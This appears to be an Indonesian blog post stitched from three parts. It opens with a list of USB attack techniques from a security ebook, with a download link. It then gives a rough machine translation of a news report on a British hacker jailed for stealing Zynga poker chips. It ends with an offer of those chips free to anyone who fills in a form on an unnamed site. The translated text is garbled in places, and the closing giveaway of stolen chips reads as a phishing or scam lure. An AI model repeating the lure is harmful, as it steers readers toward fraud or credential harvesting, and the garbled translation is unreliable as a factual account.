Serangan rinci dalam buku ini meliputi:

1. USB Hacksaw
2. USB Switchblade
3. USB Virus Berdasarkan / Peluncuran Kode berbahaya ini
4. Perangkat USB Overflow
5. RAMdump
6. Pod menghirup
7. Social Engineering dan USB Teknologi

* Pengetahuan adalah kekuatan, mencari tahu tentang serangan yang paling dominan saat ini melancarkan perang terhadap komputer dan jaringan global

* Temukan cara terbaik untuk mempertahankan terhadap serangan setan; langkah-demi-langkah instruksi menunjukkan cara

* Institut penanggulangan, jangan tertangkap berdaya lagi, belajar teknik untuk membuat komputer Anda dan jaringan tak tertembus

Download Ebooknya Here

enjoyy ..

Bagi - Bagi Chip Untuk Penggila Poker

Seorang hacker komputer Inggris yang mencuri chip 400bn game virtual dari sebuah perusahaan game internasional telah dipenjara selama dua years.Ashley Mitchell, 29, masuk ke mainframe Zynga, mencuri identitas dua karyawan dan chip ditransfer dikatakan senilai lebih dari £ 7m pada dirinya sendiri.



Mitchell, dari Paignton, Devon, menjual chip melalui Facebook untuk penggemar game lain dan menggunakan uang untuk mendanai kecanduan judi online-nya.

Lebih dari 50 juta orang per hari bermain game Zynga, termasuk Mafia Wars, di mana pemain menjalankan bisnis mafia virtual, dan Farmville, yang memungkinkan pengguna untuk membuat peternakan impian mereka. Pemain harus membeli chip untuk dunia virtual mereka. Sebuah pasar gelap di potong harga chip telah tumbuh di internet.

Mitchell, seorang mantan dewan petugas account, dibuat £ 53.612 dalam dua bulan setelah menjual sekitar sepertiga dari chip.

Tapi James Taghdissian, penuntutan, pengadilan mengatakan Exeter mahkota yang Zynga menempatkan kerugian pada $ 12m (£ 7m). "Itulah yang mereka memperkirakan mereka akan hilang jika semua chip berhasil dijual," kata dia.

Dia mengatakan perusahaan menjadi sadar pada bulan Agustus 2009 bahwa sejumlah besar chip yang hilang dan diduga dua karyawan yang identitasnya Mitchell telah diadopsi. Namun, peneliti kemudian menyadari sistem telah hacked dan mempersempit pencarian untuk Paignton. Tetangga Mitchell memiliki komputer mereka disita karena ia adalah "piggy-back" pada mereka tanpa jaminan koneksi Wi-Fi. Mitchell akhirnya diidentifikasi karena ia menggunakan profil sendiri Facebook saat salah satu upaya untuk kembali ke sistem.

Taghdissian berkata: "Sudah jelas telah ada pendekatan sistematis yang diadopsi dalam menyelidik dan mengakses Zynga Cek di [Mitchell] rekening bank menunjukkan saat ini dia membeli item termasuk jam tangan Rolex dan juga menghabiskan uang untuk judi online.."

"Dia membuat upaya ditentukan dan berulang untuk menyerang sistem Zynga Dia berhasil dan ditransfer 400bn chip dan menjual mereka untuk menyadari keuntungan yang besar.."

Ben Darby, membela, mengatakan kerugian Zynga tidak mungkin untuk mengukur karena chip yang virtual dan perusahaan dapat menciptakan sebanyak yang diinginkan.

Dia kata Mitchell telah menikmati sedikit manfaat dan menghabiskan sebagian besar hasil perjudian online di situs lain yang menggunakan uang riil.

Dia berkata: "Judi memiliki kontrol penuh terhadap hidupnya." Dia mengatakan kliennya sekarang seorang pengusaha internet dengan situs poker sendiri Facebook disebut Gambino, yang bisa mendapatkan dia lebih dari £ 100.000 setahun.

Mitchell mengakui penyalahgunaan komputer dan empat tuduhan pencucian uang dan meminta 41 kasus serupa yang akan dipertimbangkan. Dia juga dijatuhi hukuman 30 minggu karena melanggar hukuman 40 minggu dikenakan ditangguhkan pada 2008 untuk hacking ke dalam sistem komputer Torbay dewan, di mana ia pernah bekerja.

Hakim Philip Wassall mengatakan kepadanya: "Para ketidakjujuran dalam kasus ini adalah yang substansial dan berlarut-larut keamanan Online adalah prioritas bagi semua orang hari ini..

"Kau kehilangan Zynga pendapatan. Hal ini cukup jelas Anda menggunakan gelar cukup keahlian dan ketekunan untuk kembali ke sistem.

" Sekarang Chip Itu Dibagi - Bagi Pada Penggila Game Poker Yang Kekurangan Chip Dengan FREE! ..

Ni Dya Website Nya ..
Isikan Formulirnya Dan Dapatkan Segera Chipnya ..
Here ..

enjoy ...
Nikmati .......